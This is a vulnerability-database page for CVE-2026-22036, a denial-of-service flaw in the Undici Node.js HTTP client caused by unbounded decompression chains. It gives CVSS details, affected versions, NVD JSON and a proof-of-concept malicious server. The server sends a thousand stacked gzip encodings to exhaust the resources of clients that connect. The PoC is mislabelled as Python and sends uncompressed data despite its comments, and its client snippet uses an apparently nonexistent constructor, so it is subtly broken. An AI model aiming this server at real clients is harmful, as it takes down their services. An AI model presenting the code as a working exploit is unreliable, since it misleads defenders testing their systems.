Security Vulnerability Report
中文
CVE-2026-22036 CVSS 5.9 MEDIUM

CVE-2026-22036

Published: 2026-01-14 19:16:48
Last Modified: 2026-01-22 21:15:50
Source: [email protected]

Description

Undici is an HTTP/1.1 client for Node.js. Prior to 7.18.0 and 6.23.0, the number of links in the decompression chain is unbounded and the default maxHeaderSize allows a malicious server to insert thousands compression steps leading to high CPU usage and excessive memory allocation. This vulnerability is fixed in 7.18.0 and 6.23.0.

CVSS Details

CVSS Score
5.9
Severity
MEDIUM
CVSS Vector
CVSS:3.1/AV:N/AC:H/PR:N/UI:N/S:U/C:N/I:N/A:H

Configurations (Affected Products)

cpe:2.3:a:nodejs:undici:*:*:*:*:*:node.js:*:* - VULNERABLE
cpe:2.3:a:nodejs:undici:*:*:*:*:*:node.js:*:* - VULNERABLE
Undici < 6.23.0
Undici >= 7.0.0 AND < 7.18.0

PoC / Exploit Code

⚠ For Security Research Only
The following code is for security research and authorized testing only.
python
// CVE-2026-22036 PoC - Malicious Server simulating unbounded decompression chain attack const http = require('http'); const server = http.createServer((req, res) => { // Generate a malicious response with thousands of compression layers // This exploits the unbounded decompression chain in Undici < 7.18.0 and < 6.23.0 const compressionLayers = 1000; // Number of compression steps to exhaust client resources // Create Content-Encoding header with many layers const contentEncoding = Array(compressionLayers).fill('gzip').join(', '); res.writeHead(200, { 'Content-Encoding': contentEncoding, 'Content-Type': 'text/plain', 'Transfer-Encoding': 'chunked' }); // Send compressed data that will trigger deep decompression chain // Each layer requires decompression before the next can be processed const maliciousData = Buffer.alloc(1024 * 100); // 100KB of data maliciousData.fill('X'); // Send data in chunks to extend processing time for (let i = 0; i < 10; i++) { res.write(maliciousData); } res.end(); }); server.listen(8443, () => { console.log('Malicious server listening on port 8443'); console.log('Waiting for Undici client to connect...'); }); // Client-side PoC (victim connection) // const { Undici } = require('undici'); // const client = new Undici('http://localhost:8443'); // client.request({ path: '/', method: 'GET' }).catch(console.error);

References

Raw JSON Data

JSON
{"cve": {"id": "CVE-2026-22036", "sourceIdentifier": "[email protected]", "published": "2026-01-14T19:16:47.833", "lastModified": "2026-01-22T21:15:50.070", "vulnStatus": "Modified", "cveTags": [], "descriptions": [{"lang": "en", "value": "Undici is an HTTP/1.1 client for Node.js. Prior to 7.18.0 and 6.23.0, the number of links in the decompression chain is unbounded and the default maxHeaderSize allows a malicious server to insert thousands compression steps leading to high CPU usage and excessive memory allocation. This vulnerability is fixed in 7.18.0 and 6.23.0."}, {"lang": "es", "value": "Undici es un cliente HTTP/1.1 para Node.js. Antes de 7.18.0 y 6.23.0, el número de enlaces en la cadena de descompresión es ilimitado y el maxHeaderSize predeterminado permite a un servidor malicioso insertar miles de pasos de compresión, lo que lleva a un alto uso de CPU y una asignación excesiva de memoria. Esta vulnerabilidad está corregida en 7.18.0 y 6.23.0."}], "metrics": {"cvssMetricV31": [{"source": "[email protected]", "type": "Secondary", "cvssData": {"version": "3.1", "vectorString": "CVSS:3.1/AV:N/AC:H/PR:N/UI:N/S:U/C:N/I:N/A:H", "baseScore": 5.9, "baseSeverity": "MEDIUM", "attackVector": "NETWORK", "attackComplexity": "HIGH", "privilegesRequired": "NONE", "userInteraction": "NONE", "scope": "UNCHANGED", "confidentialityImpact": "NONE", "integrityImpact": "NONE", "availabilityImpact": "HIGH"}, "exploitabilityScore": 2.2, "impactScore": 3.6}, {"source": "[email protected]", "type": "Primary", "cvssData": {"version": "3.1", "vectorString": "CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:N/I:N/A:H", "baseScore": 7.5, "baseSeverity": "HIGH", "attackVector": "NETWORK", "attackComplexity": "LOW", "privilegesRequired": "NONE", "userInteraction": "NONE", "scope": "UNCHANGED", "confidentialityImpact": "NONE", "integrityImpact": "NONE", "availabilityImpact": "HIGH"}, "exploitabilityScore": 3.9, "impactScore": 3.6}]}, "weaknesses": [{"source": "[email protected]", "type": "Secondary", "description": [{"lang": "en", "value": "CWE-770"}]}], "configurations": [{"nodes": [{"operator": "OR", "negate": false, "cpeMatch": [{"vulnerable": true, "criteria": "cpe:2.3:a:nodejs:undici:*:*:*:*:*:node.js:*:*", "versionEndExcluding": "6.23.0", "matchCriteriaId": "5233A98F-D94B-41A6-9D16-4E69159ABF37"}, {"vulnerable": true, "criteria": "cpe:2.3:a:nodejs:undici:*:*:*:*:*:node.js:*:*", "versionStartIncluding": "7.0.0", "versionEndExcluding": "7.18.2", "matchCriteriaId": "EF11F080-1703-43FC-86C0-BF257C4A2540"}]}]}], "references": [{"url": "https://github.com/nodejs/undici/commit/b04e3cbb569c1596f86c108e9b52c79d8475dcb3", "source": "[email protected]", "tags": ["Patch"]}, {"url": "https://github.com/nodejs/undici/security/advisories/GHSA-g9mf-h72j-4rw9", "source": "[email protected]", "tags": ["Vendor Advisory"]}]}}
Disclaimer

This information is for security research and authorized penetration testing only. Unauthorized testing of other systems is illegal.